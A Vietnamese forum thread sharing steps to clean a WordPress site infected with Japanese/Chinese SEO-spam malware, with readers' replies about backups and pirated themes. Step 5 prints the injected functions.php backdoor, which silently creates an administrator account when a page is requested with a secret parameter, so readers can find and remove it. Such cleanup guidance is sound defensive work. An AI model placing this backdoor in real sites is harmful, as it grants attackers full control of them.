Cách khắc phục lỗi web wordpress bị index link tiếng nước ngoài

Hôm trước mình thấy có bạn trong diễn đàn hỏi về việc website bị index link tiếng nước ngoài, tiếng nhật hoặc tiếng trung quốc...
Hôm đó mình cũng chỉ biết là web bị nhiễm mã độc mà thôi. Hôm nay mình tình cờ thấy có bài viết trên inet nói cách giải quyết vấn đề này. Mình chia sẻ lên cho các bạn cùng xem nhé.

Nguyên nhân chính gây ra việc này chính là do bạn cài plugin hoặc theme từ các nguồn không đáng tin cậy, dẫn đến việc bị cài mã độc vào theme và plugin, một khi nó hoạt động sẽ chiếm quyền website và index các URL của chúng để lấy backlink.


Để phòng tránh, bạn nên tải các plugin và theme wordpress từ những địa chỉ tin cậy và nguồn gốc rõ ràng, được nhiều người sử dụng có lượt đánh giá cao.

Tuy nhiên một khi bạn đã bị nhiễm mã độc trên thì cách thức sau đây sẽ hướng dẫn bạn thực hiện xử lý tình trạng này:

Bước 1- Kiểm tra và xóa file htaccess cũ bằng cách vào trang quản trị và thực hiện cập nhật permalink
Bước 2- Kiểm tra file wp-blog-header.php, XMLRPC xem có bị gắn shell, nếu có hãy loại bỏ đoạn code shell
Bước 3- Xóa file sitemap.xml cũ đi, tạo gen lại sitemap mới
Bước 4- Tìm và xóa tất cả file shell .php trong thư mục wp-content/uploads trên hosting. Trường hợp nếu ko tìm được thì tốt nhất bạn nên chặn thực thi php trong thư mục này bằng cách tạo file .htaccess trong uploads, dán code này vào:


<FilesMatch "\.((php[0-9]?)|p?html?|pl|sh|java|cpp|c|h|js|rc)$">
SetHandler None
</FilesMatch>

Bước 5- Trong file functions.php ở thư mục theme, kiểm tra và xóa đoạn code độc bị chèn vào có cấu trúc như sau:

add_action( 'wp_head', 'my_back' );
function my_back() {
if ( $_GET['back'] == 'h00h800f' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'mr_admin' ) ) {
$user_id = wp_create_user( 'guest', 'h00h800f' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}
?>
<?php
Bước 6- Xóa tất cả các user lạ do hacker tạo ra

Bước 7- Bạn kiểm tra kỹ trong thư mục gốc có 1 file xác minh quyền google hãy xóa nó đi để hacker ko có quyền xác minh google cho website của bạn.

Bước 8- Submit lại sitemap trong Google Webmaster Tool của bạn để đảm bảo từ khóa và các link thật của bạn không bị mất TOP trên công cụ tìm kiếm.

Ngoài ra để đảm bảo và chắc chắn hơn nữa tốt nhất bạn nên đổi lại Password của hosting cũng như mật khẩu của User Database và mật khẩu tài khoản admin đăng nhập trang wp-admin của bạn.

Trên đây là các bước căn bản để xử lý khi website của bạn dính phải mã độc tiếng Nhật hoặc tiếng Trung Quốc, trong quá trình thực hiện nếu bạn gặp khó khăn có thể liên hệ tới kỹ thuật của iNET để được hỗ trợ nhanh nhất..

Chúc tất cả các bạn thành công!

 

Cách tốt nhất là xóa sạch code rồi restore lại các phiên bản backup trước đó một thời gian. Chứ mà tìm là fix kiểu này kiểu gì chẳng bị lọt.

Sợ nhất mấy thằng hack mà thay đổi được cả database thì mới xanh mặt thôi

 

Nếu như bác thì nội dung mới đăng lên sẽ bị mất đi, chưa kể nếu bác có lỗ hổng khoảng 2 tuần sau nó sẽ lại dò và hack tiếp bác nhé

 

Cái này không chỉ đơn giản là sửa mà phải có cách ngăn chặn nó lây lan lại những lần sau.
Phương án hợp lý nhất là đập lại xây mới nhưng vẫn giữ nguyên data, cấu trúc theme để tránh ảnh hưởng đến các url cũ đã index.
Cách để phòng tránh tình trạng này đó là:
1. Tuyệt đối không sử dụng các theme, plugin lậu.
2. Nếu dùng hosting thì cần sử dụng dịch vụ của nhà cung cấp có uy tín
3. Thường xuyên cập nhật bản mới nhất của WP, theme & plugin đang dùng.

 

Website của mình cũng bị tương tự ketoantc .com và khi mình hỏi thì ncc hosting nói web mình bị virut và họ quét hết nhưng chỉ được lúc đó và sau lại bị như cũ

 

Backup database, bỏ tiền ra mua theme bản quyền hoặc mua theme ở mấy trang mua chung.

 

Bài viết được lưu ở database nhé bác. Thông thường database không bị tấn công nên chỉ cần backup lại database rồi up source mới lên thôi nhé.

 

Web mình bị dính khoảng 50 index như vậy là sao nhỉ.. kiểm tra thấy nhiều site cũng bị index tương tự.... bối rối quá